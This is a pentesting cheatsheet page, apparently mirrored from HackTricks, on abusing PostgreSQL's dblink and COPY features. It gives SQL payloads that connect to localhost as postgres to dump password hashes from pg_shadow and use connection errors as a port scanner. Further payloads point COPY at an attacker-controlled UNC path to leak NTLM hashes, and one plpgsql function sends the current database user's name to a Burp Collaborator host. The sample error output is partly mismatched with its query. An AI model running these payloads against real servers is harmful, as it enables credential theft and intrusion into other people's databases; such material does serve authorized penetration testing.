daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md (6123B)


      1 ---
      2 title: "Network - Privilege Escalation, Port Scanning, and NTLM Challenge-Response Disclosure"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Network - Privilege Escalation, Port Scanning, and NTLM Challenge-Response Disclosure
     14 
     15 **Find** [**more information about these attacks in the original paper**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt).<sup>[[1]](#references)</sup>
     16 
     17 Since **PostgreSQL 9.1**, registered extensions such as `dblink` can be installed with `CREATE EXTENSION` when the database role has the required privilege.<sup>[[5]](#references)[[6]](#references)</sup>
     18 
     19 ```sql
     20 CREATE EXTENSION dblink;
     21 ```
     22 
     23 Once you have dblink loaded you could be able to perform some interesting tricks:
     24 
     25 ### Privilege Escalation
     26 
     27 The file `pg_hba.conf` can be misconfigured to trust local connections without a password. Rules are matched by connection type, address, database, and user; `local` applies to Unix-domain sockets, while `host ... 127.0.0.1/32 trust` applies to loopback TCP. A common Debian/Ubuntu versioned-cluster path is `/etc/postgresql/<major>/main/pg_hba.conf` (for example, `/etc/postgresql/12/main/pg_hba.conf`), but the active path should be confirmed with `SHOW hba_file;` when database access permits it.<sup>[[1]](#references)[[2]](#references)</sup>
     28 
     29 ```text
     30 local    all    all    trust
     31 ```
     32 
     33 _Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it._\
     34 _Note also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user._
     35 
     36 This case is **useful if** you **already** have a **shell** inside the victim as it will allow you to connect to postgresql database.
     37 
     38 Another possible misconfiguration consist on something like this:
     39 
     40 ```text
     41 host    all     all     127.0.0.1/32    trust
     42 ```
     43 
     44 As it will allow everybody from the localhost to connect to the database as any user.\
     45 In this case and if the **`dblink`** function is **working**, you could **escalate privileges** by connecting to the database through an already established connection and access data shouldn't be able to access:
     46 
     47 ```sql
     48 SELECT * FROM dblink('host=127.0.0.1
     49                           user=postgres
     50                           dbname=postgres',
     51                          'SELECT datname FROM pg_database')
     52                       RETURNS (result TEXT);
     53 
     54 SELECT * FROM dblink('host=127.0.0.1
     55                           user=postgres
     56                           dbname=postgres',
     57                          'select usename, passwd from pg_shadow')
     58                       RETURNS (result1 TEXT, result2 TEXT);
     59 ```
     60 
     61 ### Port Scanning
     62 
     63 `dblink_connect` error differences can provide a crude port oracle. `dblink_connect_u()` permits non-superusers to use authentication methods that could expose server credentials, so its execution privilege is revoked from `PUBLIC` by default; it is useful only if a privileged administrator has granted access.<sup>[[1]](#references)[[3]](#references)</sup>
     64 
     65 ```sql
     66 SELECT * FROM dblink_connect('host=216.58.212.238
     67                                   port=443
     68                                   user=name
     69                                   password=secret
     70                                   dbname=abc
     71                                   connect_timeout=10');
     72 //Different response
     73 // Port closed
     74 RROR:  could not establish connection
     75 DETAIL:  could not connect to server: Connection refused
     76 	Is the server running on host "127.0.0.1" and accepting
     77 	TCP/IP connections on port 4444?
     78 
     79 // Port Filtered/Timeout
     80 ERROR:  could not establish connection
     81 DETAIL:  timeout expired
     82 
     83 // Accessing HTTP server
     84 ERROR:  could not establish connection
     85 DETAIL:  timeout expired
     86 
     87 // Accessing HTTPS server
     88 ERROR:  could not establish connection
     89 DETAIL:  received invalid response to SSL negotiation:
     90 ```
     91 
     92 Note that **before** being able to use `dblink_connect` or `dblink_connect_u` you may need to execute:
     93 
     94 ```text
     95 CREATE extension dblink;
     96 ```
     97 
     98 ### UNC path - NTLM hash disclosure
     99 
    100 On a Windows PostgreSQL server, a database-side file access to an attacker-controlled UNC path can cause the PostgreSQL service account to attempt SMB authentication. This requires a role permitted to perform the relevant server-side `COPY` operation and outbound SMB reachability.<sup>[[4]](#references)</sup>
    101 
    102 ```sql
    103 -- can be used to leak hashes to Responder/equivalent
    104 CREATE TABLE test();
    105 COPY test FROM E'\\\\attacker-machine\\footestbar.txt';
    106 ```
    107 
    108 ```sql
    109 -- to extract the value of user and send it to Burp Collaborator
    110 CREATE TABLE test(retval text);
    111 CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
    112 DECLARE sqlstring TEXT;
    113 DECLARE userval TEXT;
    114 BEGIN
    115 SELECT INTO userval (SELECT user);
    116 sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
    117 EXECUTE sqlstring;
    118 END;
    119 $$ LANGUAGE plpgsql SECURITY DEFINER;
    120 SELECT testfunc();
    121 ```
    122 
    123 ## References
    124 
    125 - [1] [Having Fun With PostgreSQL](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)
    126 - [2] [PostgreSQL documentation — Client authentication](https://www.postgresql.org/docs/current/auth-pg-hba-conf.html)
    127 - [3] [PostgreSQL documentation — `dblink_connect_u`](https://www.postgresql.org/docs/current/contrib-dblink-connect-u.html)
    128 - [4] [PostgreSQL documentation — `COPY`](https://www.postgresql.org/docs/current/sql-copy.html)
    129 - [5] [PostgreSQL documentation — Additional supplied modules](https://www.postgresql.org/docs/current/contrib.html)
    130 - [6] [PostgreSQL documentation — `CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html)